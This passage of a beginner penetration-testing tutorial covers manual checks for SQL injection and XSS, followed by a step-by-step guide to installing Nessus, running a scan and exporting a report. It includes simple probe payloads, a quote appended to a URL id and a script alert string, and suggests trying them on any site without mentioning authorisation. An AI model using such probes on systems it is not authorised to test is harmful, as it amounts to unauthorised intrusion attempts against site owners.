3. Target discovery

4. Enumerating target

5. Vulnerability mapping

6. Social engineering

7. Target exploitation
8. Privilege escalation

9. Maintaining access

10. Documentation and reporting

6. Scope of Pen-testing
Scope defines what we can test.?

1. A single system
2. Multiple system
3. Whole network
4. Networking Devices
5. Web Application
6. System Application

The scope of VA & PT is very wide we can perform VA & PT on almost every device and every
type of network.

7. Why Penetration Testing


Now days penetration testing has become the need of every company due to the following reasons.
1. To minimize the risk of Zero day vulnerability.
2. To expose the vulnerability and release patch for it.
3. To identify loop holes before Hackers.
4. If problem is there report it to Security team
5. Implementation of Security team.
6. Exposure of Security Level to be maintained.
Module 22
Live VA-PT
1. Manual VA-PT
Manual vulnerability assessment and penetration testing is the best practice to do but it takes time as
compared to tool based testing. So if you are performing testing without a tool you need to know
the common vulnerability that exists in real world.

To Test SQL injection manually

-->Find the URL Revealing ID of a Object.

Example:- http://www.abc.com/index.php?id=1

Just Put single quote ' over ID number.

Example:- http://www.abc.com/index.php?id=1'

**Here we are getting SQL syntax error. It means it is vulnerable to SQL Injection.
To Test XSS manually

Visit any site and find input boxes like Search Box, Comment, URL accepting arguments etc. And
put this simple java script "><script>alert("Test")</script> in Input Boxes of website and if Get
Pop-up. It means site is vulnerable to XSS.

Here we have sample site where we input a simple java script in Find Box.

and when we click on Find. Here is a pop-up which means this site is vulnerable to XSS
Testing each and every vulnerability manually it will take lot of time. So the solution is Testing by
Tools. In market we have lots of tools some of them are below.

Acunetix WVS (web vulnerability scanner)

Acunetix WVS (web vulnerability scanner) automatically checks web applications for
vulnerabilities such as SQL Injections, cross site scripting, arbitrary file creation/deletion, and weak
password strength on authentication pages. It boasts a comfortable GUI, an ability to create
professional security audit and compliance reports, and tools for advanced manual webapp testing
AppScan

AppScan provides security testing throughout the application development lifecycle, easing unit
testing and security assurance early in the development phase. Appscan scans for many common
vulnerabilities, such as cross site scripting, HTTP response splitting, parameter tampering, hidden
field manipulation, backdoors/debug options, buffer overflows and more.

Nessus

Nessus is a remote security scanning tool, which scans a computer and raises an alert if it discovers
any vulnerabilities that malicious hackers could use to gain access to any computer you have
connected to a network. It does this by running over 1200 checks on a given computer, testing to
see if any of these attacks could be used to break into the computer or otherwise harm it.

2. Tool Based VA-PT


Performing a VA-PT via tool is very easy but we should know how to deal with our tool. So this
tutorial will guide you how to do a Pentest.

Requirement
1. A Computer
2. Nessus
3. Human effort.
4. Internet
Nessus is a good tool for VA-PT and widely used in many scenario. It is multi Platform tool can be
used for testing different flavours of Operating system like Windows, Linux, Solaris, FreeBSD etc,
Network Pentest like Router, Switch testing.

Download link:- http://www.tenable.com/products/nessus

Working With Nessus

1. Download Nessus from here


http://www.tenable.com/products/nessus/nessus-download-agreement.

2. Accept license by clicking on " Agree" Tab

3. Select Operating system. I am Downloading for Windows Platform.


4. Once download complete. Click on setup file to start Installation.
5. Click Next to continue.

6. Accept license and click on next.


7.Keep Destination folder as in Default location.

8. Select complete as setup type.


9. Click on install to start installing.

10. It will take time to install.


11. Once installed click on finish.

12. After that Web interface will come that will ask to connect via SSL.
13. Click on "I Understand the Risks" and then click on "Add Exception" to start Secure
connection.
14. Click on Confirm Security Exception.
15. Welcome screen will come. click on Get started.
16. Create an User here.

17. Next it will ask for Activation. You can purchase it and get it. But you can get Activation key
For 15 days free.

Got to this link:- http://www.tenable.com/products/nessus-professionalfeed/nessus-evaluation


and click on Evaluate.
18. Accept Nessus evaluation agreement.
19. Fill detail here. It will ask for Email ID so that it can send you Activation Key for 15 days.

**open your Email ID you will find Activation key Either in INBOX or SPAM folder. Put that key
in Nessus Activation Window.

20. Once Activation is Done. It will prompt for download plugins. Click on it to start downloading
updated plugins.
21. It will start downloading plugins.
22. After it will start installing in your system.

23. Once Done. Home screen of Nessus will come and ask you to login with Username and
Password.
24. Login with Username and Password created above.
25. Click on Scan--> New Scan

26. With Nessus you can test Web Application as well Network also. Specify what to test in Scan
Policy. After that Mention Target IP address or URL. Click On Create Scan to start scanning.
27. Scan will start. when completed Double click on your scan to explore it.

28. Click on Vulnerability to explore it. It will list all your target vulnerability and loop holes.
3. Reporting a VA-PT

Reporting is nothing but the detail Report about the scan in a proper way so that it can be easily
understand by everyone

Reporting in Nessus is very easy

1. Click On Export.

2. Choose Export Format, Chapters and then Click on Export.


3. Select "Save File" and click on Ok.

4. Right click on Saved file and Choose "Open" to open with Firefox browser.

5. Now here is the detail Report of Target. Scroll down to see more.